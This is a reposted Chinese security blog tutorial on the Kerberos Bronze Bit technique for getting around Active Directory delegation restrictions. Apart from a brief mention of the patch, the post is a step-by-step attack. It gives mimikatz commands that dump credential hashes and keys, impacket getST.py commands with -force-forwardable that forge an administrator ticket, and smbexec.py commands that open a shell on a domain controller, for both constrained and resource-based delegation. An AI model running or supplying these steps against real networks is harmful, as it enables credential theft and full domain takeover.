【详解委派攻击】绕过委派限制Kerberos Bronze Bit

admin 2023年1月28日14:15:24评论22 views字数 1219阅读4分3秒阅读模式

一、Kerberos Bronze Bit概述:

通过此漏洞可以绕过以下两个限制进行利用:

①配置约束委派时,勾选的是"仅使用Kerberos(K)"

②伪造高权限用户票据时,此高权限用户的属性配置了"敏感用户不能被委派",或者高权限用户在"受保护的组"内

要避免委派限制的绕过,最好的方法就是打上微软的官方补丁:

限制的配置如下:

高权限用户administrator被设置为"敏感用户不能被委派",或者拉进"Protected Users"组,二者配置一个就行:

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

勾选的是"仅使用Kerberos(K)":

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

二、绕过约束性委派限制:

配置了限制条件之后,就不能通过常规约束委派利用请求,s4u2proxy请求会失败,因为票据是不可转发的,错误如下:

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

1、需要拿到约束委派服务账号的hash和aeskey,利用mimikatz抓取:

# 获取hashmimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit" >hash.txt# 获取ekeysmimikatz.exe "privilege::debug" "sekurlsa::ekeys" "exit"  > ekeys.txt

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

需要lm和ntlm hash:

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

2、请求票据:

不加漏洞新添加的参数,无法请求票据:

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

加上参数再次请求票据,成功绕过限制:

python3 getST.py -spn cifs/域控机器名.域名全称 -impersonate administrator -hashes <LM:NTLM hash> -aesKey <AES hash> 域名全称/约束委派服务账号用户名 -force-forwardable

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

导入票据,获取shell:

export KRB5CCNAME=administrator.ccachepython3 smbexec.py -no-pass -k PANDA.hack.com

【详解委派攻击】绕过委派限制Kerberos Bronze Bit


三、绕过基于资源约束性委派限制:

配置了限制条件之后,就不能通过常规的利用方式进行请求高权限用户administrator的票据了,错误如下:

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

使用新版本impacket中的getST.py,加上针对此漏洞新添加的参数,就可以绕过限制获取高权限用户administrator的票据:

python3 getST.py -dc-ip 域控ip 域名全称/新添加的机器账户名$:密码 -spn cifs/win-2008.hack.com -impersonate administrator -force-forwardable

【详解委派攻击】绕过委派限制Kerberos Bronze Bit

导入票据,获取shell:

export KRB5CCNAME=administrator.ccachepython3 smbexec.py -no-pass -k WIN-2008.hack.com

【详解委派攻击】绕过委派限制Kerberos Bronze Bit


原文始发于微信公众号(哈拉少安全小队):【详解委派攻击】绕过委派限制Kerberos Bronze Bit

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月28日14:15:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【详解委派攻击】绕过委派限制Kerberos Bronze Bithttp://cn-sec.com/archives/1526639.html

发表评论

匿名网友 填写信息